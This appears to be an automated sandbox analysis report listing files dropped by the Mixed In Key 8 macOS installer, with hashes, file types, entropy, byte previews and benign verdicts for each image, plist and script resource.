                                                                                                    SHA-256:41C556FAE0A8FE1B690393244D14381FFD902587578B366C7EF3C23A6A058639
                                                                                                    SHA-512:FC9AC66D9EF0DA305BFA02313A0CC3EEE0580513BE69D7BA45A6BD3E91680FE07DCFC1F1475BE8EBA7ABFECFD958E1756BAEDC7E725D9D33B0B46E521B482B60
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...(...L.......bv....iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_HUtis2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):13575
                                                                                                    Entropy (8bit):6.755090526530679
                                                                                                    Encrypted:false
                                                                                                    MD5:FE9DBA29111114642329ACF215720D7D
                                                                                                    SHA1:E95D7D163F4FDF5D2B4F5548D6F9D29AE4500713
                                                                                                    SHA-256:7A3E426832F6D41013249D74BE058AC5E8D5976D82BA0B6132BDACCB8FC7ACAB
                                                                                                    SHA-512:21F17E3C19C70DB3B1ED6DFA110F8AA34AD84F47FF4F6CEEDAC02E7A8E275556EC3CD51B937A7D3836D53345D71966496B8E5BA570CCFF3E2CDCC54BED33C1AB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.V.W.d.e.h.i.m.r.~............................................................. .(.1.2.>.?.@.I.J.O.P.U.Z.e.f.m.n.q.|.}...............................................................#.)...3.8.=.C.J.K.Q.R.W.X.].^.c.d.h.u.v.w.x...Q.......................................4.X.............z.f.M...g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}.~..............................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.+_TtC10MixedInKey25FindReplaceViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;.....n.p.r.u.~...K..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.........
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_IItEZq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):8972
                                                                                                    Entropy (8bit):6.836398755207312
                                                                                                    Encrypted:false
                                                                                                    MD5:812F3AB2AF92237E90E557592AB7EECB
                                                                                                    SHA1:4A946B9B4CFFE51EA7B4DC1F37E3B4CE2186801B
                                                                                                    SHA-256:A3D71A2A842F2FDA4BEB67AA93FF1400200707E00F9037FE3898BD7CC9DCB9C8
                                                                                                    SHA-512:E2D30318A149031F44CBB80A99B0C73115AEC1E92F4F4CCB8FFD0501C27ABDEC7DF0243CF730BE4B247DDD9D6ED229A7698FF1854DEF4ADD197177F15F6C522A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...\.............>...................................J....2016:07:01 15:59:38../..P...1.A@.($....B...,F.....P..j/..."r.l.9......<ZM..J.....e1...2...I4...t...gF.Oh.y}..E..&..U".N.....]&.@..j.....0...O...`.........N.....u..<...b....N..0..../N......J.6....QFj.4..@.)p.N..[%..........M.@\".S...p.B..S.B..8R......u8N......m8J......e8F....>..t-..y..........................J.........................................................................R.................................J.........................v...........~.............(...........1...........2...........=...........S.......................i...........s.....H....................................button-divider@2x.png.tiffutil v310.2016:07:01 15:59:38.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_IlJqn5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):11080
                                                                                                    Entropy (8bit):7.095794726210357
                                                                                                    Encrypted:false
                                                                                                    MD5:82389DB380D37B21AC748073D664FB5C
                                                                                                    SHA1:CEB9DF3877B79F063188F19D747ACE0C14B167D8
                                                                                                    SHA-256:E12FD31D5CCD617AE18FBF794D827F65C3BEC979646BBD73D791638552F33BAF
                                                                                                    SHA-512:97AF4DE4969CE7E86A4BEBF28E27951C91F7747D38F2BFD7407D4E0298FA93D31BE34B211085858927B09442094E936B699FDB80AE09C28CF3AECA0FE7FDEF52
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...~.............>.......................,...........,....2016:07:27 02:44:26.....`.....B`..L".....0..F(..DcQx.b;....1..rG..Dc2HL..........m ..cQ...!9.Og.P..e...@2..*.E..e..P..#..a"XHB.....0.t%..i.[p..F.<....jeN.(.P...t$..%.F...$.>.A.p.$%..[BV6H...$.O...=6......c4$....A8.f.....!*.JZ....h9..n.9.Xc4..%.Y.k.\.f..m..a+..g-D....x}<..?BB..'.Z...!(.N....R.3..%..7B@.o...L!#....-.4.:......H..B...M.#<...(...>hx....H..1'..{#K.....i......./...$.%B....y....I...HK..=....!!.... .z...H......../p&...Hk)..1R..hI....$T.I.0....H.).(H.....'.%HL>.....5..b._.130........H_).(0.C(..N.!%....R..,.......|....H....H."KT..5R......I....%X.. .C1BC..E8Q.r.!%...?.B.&1....[.:..2(08..h4..S.2...HH..7..t....l.\4..7.........g...d]............(d..HV..!8.0..i.4..........H.U...BM..vDN......h..R.T.'*|.D........D.8.3..8x...(hS.2....g .t0.#"..L.O!.'..R.0..63...R.H!0.j.......O&8.!.h.j5......B..n.....&...q2^..$...s...(..hMk..`.$.....n.3..]..O!.s....f{...]......$.wr..*..].=,.........Q.6S..t.....hOC.c8.....[.......<...({Iz5B.../.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_K6bRw7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 145 x 145, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):8728
                                                                                                    Entropy (8bit):7.945521166023985
                                                                                                    Encrypted:false
                                                                                                    MD5:BB8833461FB7746AB0D8EB8DD9192309
                                                                                                    SHA1:F8233324839BEBA999B07E2C00F21E76FFC8026C
                                                                                                    SHA-256:B3425993FF07645E7C1BFF16BADEFEB2E248FD24BA08C7A879B2246D30656251
                                                                                                    SHA-512:1E430F86F61A86927032B9AB2A29CBA58F1AFFA02E88089B9FBAD7C4DBE485F9652F88CD65ACC267A83E0C7FD56D07EE965F50E734B71C3235F4730ED3B1ACF0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...............Z#....iCCPICC Profile..H....TS.....7.......{o...P..`#$.B.!...*.#8.TD.......".".X....N.AD...6...<..{.....ur..............g....2.9|.0:.....L.?......X..".oTT8@5=.].o...nZO......T8\...(..T......t...B1.H.j7...&x..jB.@.['8}.{&8u...>...(...@f.....'r....h.2.e;>..Gy"..;..Ay#.V99.&..e....I.[.TyL.+].S{..!.'.d.........-..a..r.0$..5&.-kQ.....#........IH.4.E....a....f....4^.S.G...f..hy|.(0f.Y...$Yq...\.<faFl.4...gO.(+&.......D.kN.....#...xL..8#6D.G.....Dy..n@........~....(.?7;Xn...........(..d.B.....`@.q .....@...>......../.,...3.t_..q.L>....`g..`.>N..oi....].n[]...I.Lv..-.:.GS. 5}....@y..K.l.0o.......P.j@...........x....BA$..I`.`....V..........`+....^p....@.h...Ep.\......!.....`.. <D...&...C.......@(......(..C.h)..*...*h.T...NB...P.t...F.7.g..........0.....Xx>.....p1....k.Cp3|.....R..<..D..!..5.@..H$.IC..r...@j.....Fn"R.%....P1t.5.......1....u.*.AL3..s.3...|.R..XK.;..M..c..%...~l.....;.}...h8S.+......-.....5.:p}.A......[.=..x.^./.o.........?...z..B.!..'."T...g.7...q.2
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_KVmBcz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):1365
                                                                                                    Entropy (8bit):4.937763229891162
                                                                                                    Encrypted:false
                                                                                                    MD5:7366249E912217EB37327DDD26C91CF5
                                                                                                    SHA1:0FE27D2B2B10C0E80A7A85660626A9FA3CFC8957
                                                                                                    SHA-256:86783DCB04B7D13C9DFF3B47DAF1AA1B2462339D5E37CDE3CA0C4B587283BACD
                                                                                                    SHA-512:F354E70B8C7A5091000FDBA82DDD0C0F6D209AEBAFCEF9C880BD7ED8B56473129F9F766EC54D03E6F0EBAF9C4E9F82F77B71AEACA2B5D6B6DD41DAB8F9F19AE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*..Javascript for Mixed In Key top theme..Copyright 2008 Mixed In Key LLC.. */../*.The following functions are required for navigation. */..//.Selects the tab with the specified identifier after.//.the the pane selection changed in the appliation..//..function selectTab(tabId).{..if ( tabId == 'browse' ) {...document.getElementById('browse').className...= 'first tab selected';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'tagedit' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab selected';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'preferences' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab selected';..} else {...document.getElementById('browse').cl
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_KfFne7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):9286
                                                                                                    Entropy (8bit):6.903055466470939
                                                                                                    Encrypted:false
                                                                                                    MD5:73600D04D1653BD1CCA4DD6C64C14434
                                                                                                    SHA1:92FB838B830B6EBC3FE546A88F064D810C04046B
                                                                                                    SHA-256:E76CF859E911AA5B8806F6453A12BE466ED8AC60F68EDB42560D0C4003038269
                                                                                                    SHA-512:ABBC03CC83FB764F17DBD486938A1EFC06558A863C8C1F1325524889EA242A22BF5E77E3ADFD74294E3F968732F73CC04E691BD5F61D36FA0B1672C274A9E005
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*.................>.......................d...........F....2016:07:01 14:42:36..9........BaP.d6...DbQ8.V-..FcQ...7..HdR9$.M'.Ge..d.]/.K.S...m7.J.s...}?.N..:%....Q.T.e..M.TjSJ}N.W.G....v.....V:...g.Q...e.sk.\nR....w..o...R.}.`aW......bo..V6...dm...V...fk...v...hiZ......jg..V.k..lfP=.....nd{......pm.......rn..W6M..t`.'.K."q.#.~.g....b.'_.....|..d=..{{~P......}........f..z@...r..+.l......g.........oa.q.0..j.'.<.......F..wE...o..kd..(..n....h...t....}..&y.u..l*.....$.2Z(f.2|......+..Y.s..T.0L.1.k..+:..H..j..S.dN...d..$........ ...........d...........F.............>...............................................J...........R.................................F.....................................6.............(...........1.........f.2.........t.=...........S.........D.............i...........s.....H...P................................control-bar-gradient@2x.png.tiffutil v310.2016:07:01 14:44:52.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_NbaAVx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 56 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):548
                                                                                                    Entropy (8bit):7.504856942939381
                                                                                                    Encrypted:false
                                                                                                    MD5:BE5DC62C237BEAE68FF7E8AE51353BB7
                                                                                                    SHA1:4CE0E9841287515186DAFB40766B48725231B39E
                                                                                                    SHA-256:3B966785A1A5DDE4BBC0CF9386DC506568D8BBDA66898160942546311FE7AC4C
                                                                                                    SHA-512:8944561C69DDEFFE5F6CD7B3117677CDC2D8279BC4AEDDD9EE3C0E570589AB932B79E2450651C62162C7410846639890AD1A533882E19FC0AC7F849A191B330E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...8...<.....3.y.....sRGB.........IDATh...ANB1.......@4.......n G...'.*...7..Q..&....>.G.Wh.u...L;3mg..-J...F]ZR......C?4.......[..^&.%...b..v.Qw. ._VOI=+..%Ms.RE=.|?4.T'........k.S.B...e..W:......St.Iu.t..s.Gd...|..y6...:.3..W....A..T..R.q. ...*AP*9.....R%.J%.q. WB..A..8n..JH. (.....\........A.+!U..Tr.7.r%.J..J..N_..5..GU.N.3{.{..Y.(.;..ME...gz......m:.rb/[M`...V.@...+..P.v.,.P.>..U.t;..N(....*T...K'....s.*.................tkS=2..q.._}......B^.?P;.R.v........~.(.....}.x0....vp.o........H.....X.......T.......X4VKv&....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_NpdCIX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1727
                                                                                                    Entropy (8bit):4.825623810901468
                                                                                                    Encrypted:false
                                                                                                    MD5:9A2B82DA3F108EA900D5BEEECA152F91
                                                                                                    SHA1:68BC88D1397E061E63FF8D3083003265040738A3
                                                                                                    SHA-256:1A7F3FBD2C4F4FCA70986E1B508267B6760207218BE32DA6C23F1D829201B9F6
                                                                                                    SHA-512:0836A92361AE94AD4BD9985AE88EB4D6904AEBB435BC284170D6FC5A78F9217B8328EDFE6EE29C71E377AC0CE7A3D5FFB6B6B7958B1922605D2F8FB3AD646346
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>VIPCode</key>..<string></string>..<key>user email</key>..<string></string>..<key>volume</key>..<real>1</real>..<key>PianoVolume</key>..<integer>1</integer>..<key>PianoMode</key>..<integer>0</integer>..<key>elite</key>..<true/>..<key>show audio quality warnings</key>..<true/>..<key>automatically rename files</key>..<false/>..<key>show song drag dialog</key>..<true/>..<key>file renaming format</key>..<integer>1</integer>..<key>id3 tag option</key>..<integer>2</integer>..<key>id3 tag value</key>..<integer>2</integer>..<key>key view option</key>..<integer>0</integer>..<key>ReferenceKeyOption</key>..<integer>0</integer>..<key>tempo precision</key>..<integer>0</integer>..<key>adjust tempo</key>..<true/>..<key>tempo minimum</key>..<integer>79</integer>..<key>tempo maximum</key>..<integer>192</integer>..<key>writes id3
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_RZtOnz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 437 x 322, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):16103
                                                                                                    Entropy (8bit):7.846252129656133
                                                                                                    Encrypted:false
                                                                                                    MD5:8E9A5DF26B0A055B7F1A78E44D86B68C
                                                                                                    SHA1:FC69A4B2BEE7E105A72574FA94BED085C4076D97
                                                                                                    SHA-256:8FAD8E958D11C71BDAB7586945FF44B56449FDB453451D7AC2FF75736ACBE02E
                                                                                                    SHA-512:F29642ED43199D6D669F4DCF75029A1230D26FBB9092906A3E32CDFA5ADCBD063AB3C835D50ABAB65B6FCB95727FB196DCE7B17966C3DB2D00983E35BB99851E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......B.....v=C|....sRGB.......>.IDATx...;o.G..O../....B...8S..Cp..,..d/6....J..Sl.....W.....B0vCe.....y./...~M.h.]="..6.........S...:.w..8N...7..m.\.no...g.9.{....n...-......ma.K..v..?..G..f.[%q.z.W{47..E....?..n.uO...W..b........l.7l.%.q~...}....s...\.vF.............|r...nx.3g[.f...........z.2|..\.bK+..I.....N..v........%.R.7.._?t...zg..ak.....+...7..5g'.{.m..7.so....7|..Q;...QW..s.{....f.{N.....`[......K.Y...m....M...5.^..o.wkE....~.....UK.g_Y.b...W.k..?..j....=~.W.T.7R.Z..[.!g....-..U.U...w....;.{F*.b......9.l....u;$..|..._u.E.......=+...-._..E.].;~.N.A1......G.....q...~0n......k_..^.5..?..e'.{.......m...m.T.c7tU.....6.k....O,UmJ.wx.^-]p/...>...0v..}.m.....lk....-.\..E...?~.......O....W...cG:v....6.........m...?.n.N.w.z{...{...jOm.....>.f...36.k.....:...k.....T..&T.@.=.R51k..`....;v..5........ @..G..ht..#....A ..h.......=....{.P...~.X@..5..j...=....ID..z ...z.....4..!.+..2P...V.{=.....=.....G.D...~.4.8.<....{.e[..........E.#..0qh........R..AO..D..K.WQ..wi..D....Q.d
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_UnrNXM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 23 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):954
                                                                                                    Entropy (8bit):6.53143682098142
                                                                                                    Encrypted:false
                                                                                                    MD5:378B4557544CA5B05873FD646C38C5F8
                                                                                                    SHA1:93736930523AFBD0DDF9AA5B49E6DA3383276027
                                                                                                    SHA-256:D6EFE7881C8BA63E7B54D49FA787BE2243A2E78D6FD41A1925BC9A35B385495A
                                                                                                    SHA-512:B4198CCAB4DECFCE5EC28F282185D2E3C3A14AE184CC530F960F1968F548FD0A450E161E46F6ED2F7D1CFB2AABFAA556E6B280F3008B51357F5FCC629D7981B5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.............f.......sRGB.........pHYs................0iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <xmp:CreatorTool>Acorn version 4.5.2</xmp:CreatorTool>. <tiff:Compression>5</tiff:Compression>. <tiff:YResolution>72</tiff:YResolution>. <tiff:XResolution>72</tiff:XResolution>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>...3M...#IDAT8...+..0...p.... ..$..f..2.`=xV.E.....0X..{.#...&.....<....[.......a.4d.6...m..vSPQ0.yN.Q.l....<........%....2..}(..t..F<.]....y.A..`.....i.......:2M...c\...,.....i...UU1.5.............o.q..>....wI..a..q$nY.r.../.q......<. q.0......0..4....8.}..#.6..DQtb.o..$I@UU..{B..i.E!.2x|cd...[......;.$..~....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_Uwi9EH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):108888
                                                                                                    Entropy (8bit):7.9579195875467565
                                                                                                    Encrypted:false
                                                                                                    MD5:3E2796C3A8DFE433D22DB7CC414E1EF5
                                                                                                    SHA1:DF83591755ABFD478A81F95C2942AE689B2ECE68
                                                                                                    SHA-256:DA74013E33AE2387D36F1723714FB85FDACEBD7F46E61579D8C7CA993295547F
                                                                                                    SHA-512:B6BFDA7FC5B30798416454759C3ACB7C519E5D17DAB91A18AE925A6B422ECAF7AFD537E36F78575D41D537B340708A5C8D1A56E72B761A8E033127881DE75B7A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*..^..? @.$....BaP.d6...DbP......FcQ.K...{...h.rM...%2yd"W...ar...36.Mg0Y...8....)U.v.............t..V.A.?..w...W... H.J.=.X#..T.m=..a..l..r.^oQK,..{.`o.g...p.`qP.N.Q~.`...].....A. P....>.....E....3L..[...v8....D.Y%Q.....}>...H.............@...v/..../......~.^..H......>.......r=.n.y..C..~.......,..H.T.)(*... 0.....$..'y.~)M.N.7K.J......:.+,.@IdI..1J.....T......1....Bq."...3../.l|..1...;..........@ ...@...........J{L......tn..rt^..r:....:.4..#....*H.>...............Tl..NS4..:Sd.<E......."..G........"...O..TN.SO.cNMR.&.V..h....=X.J..(.su\..heYd.. .EMu...A/....@.!.....oYO.B..g..SX..... ..i.h .T..e.iX.k........h..I%...."X...[.D......x.......q....M...XRn..2;..........R..*..hE.....R.....]a.........Q..V...dK...f.ZP|.@.J..@......J......c.C]Mi...J.y&...s.;.i...M./..w....V.{|T.h\.U^a2.I.S.o..p....0....7i^...Wn..)..{,. {="...)jr.?@.0w..|c._..,Wz!.3.-.........K.~6]J'a0.w...._7....#.`.R..*.I.SG'...U-....kz_.x..w.../C...%.^...Wo~...|."hb.M...". +.........Y..b.(....>...u......IV.eU........Y=d.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_Vfcq5N
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):1311
                                                                                                    Entropy (8bit):7.841926633046951
                                                                                                    Encrypted:false
                                                                                                    MD5:CAA146DCFBE758CC18AFB3600925697F
                                                                                                    SHA1:CFC5A002A0359814B0D96DFDE16478A3221140C7
                                                                                                    SHA-256:4639521D24D05DCFA67D8225D336285F0A822F968E7FDC779D32CFDEA8B22B5A
                                                                                                    SHA-512:009448ECDC4D7770A9EEB52A2B6B2B1E3776B4ABD58EEBA3AC46DA9D3C9A3602699805C7B03488B26A3F710E627C660050AA56AE2764A6D20F37E4AC2A95EF00
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...,...,.......Z.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov...r.4......R..il|Bj......A4%U..N$.A.s.{..z..[V.{.w.w........@.G..*...q.Y...<..).t.......9Nyx...+=.Y"|@5-..M.S.%.@.H8..qR>.......inf....O......b..N......~N..>.!....?F......?.a.....=..5..`.....5.._.M'.Tq.......V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A.*..O.y..\..V........;..........sM^|..v.WG..yz....?.W.1..5..s...-_...)....U..K.uZ17..l.;=......s...7V..g.jH......U.O^...g..c.)1&v..!.......K...`m.....).m..$.``.../]?[x.F...Q....T....*d4...o...........(./l....mSq...e.ns.....}..nk.~8..X<...R5. ...v.z..).....9R.,.....bR.P.CRR.%.eK...Ub.v....n..9B...Je........R...R.~N.....o...E.x......IDATX...KN.0..P.#.@.X.f.7...]r.8..#9.+V,...z.0.p..c....X.....e2q......Z...a..%.......a...pl`...........dD.o....<M.3>H....^)u.`.{5)..v.....@.....;j....=.......y.`.>.LS`.m.......s.)..-pJ?.......s...1....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_Wy7cHf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):10450
                                                                                                    Entropy (8bit):6.647227176132132
                                                                                                    Encrypted:false
                                                                                                    MD5:99151DD78BEA752A21F36BC4DF250549
                                                                                                    SHA1:55EF61C93028D4501FCCB98C9BDCC81BD88AC85A
                                                                                                    SHA-256:C39AFAF4E72567DAFAFA75B682A8351404BD1811F675913F6C658BDDE1AF464E
                                                                                                    SHA-512:127E4AEC260A57954C978579B79D7CF9AD4467F28490A82694FF5CF0A94AD260CDA6078979A0D5A735420D43E5FCC36BDE4F47E964B943669F32B588455C26B1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............>.?X$versionX$objectsY$archiverT$top.......x.......#.$.*...2.:.B.S.T.a.b.e.f.j.o.{.|.....................................................................%.&.'.0.8.<.@.D.G.L.Q.W.X.e.n.u.z.......................................J...-...p."...w.#...$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.8.;U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....Y.W.T.v...v.u.w.X.. ...!."[NSClassName...._..RemoveExtraSpacesViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8.....M.O.Q....;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel..........C.D. ...E.F.G.H.I.J.K.J.M.N.O.O.Q.R_..NSOriginalClassNameWNSFrame_. NSDoNotTranslateAutoresizingMask_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar..................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_XuU7QF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:data
                                                                                                    Size (bytes):959062
                                                                                                    Entropy (8bit):7.992276888459757
                                                                                                    Encrypted:true
                                                                                                    MD5:CDAABACF66ADAA4E2944D89E40A5C2C7
                                                                                                    SHA1:02D0A97412DC7350B84D142621E784EAF331EE3F
                                                                                                    SHA-256:C63F58A16857BAEB212479BE79500A7B3353C9A244AC2FDB38C0618708C2C6EF
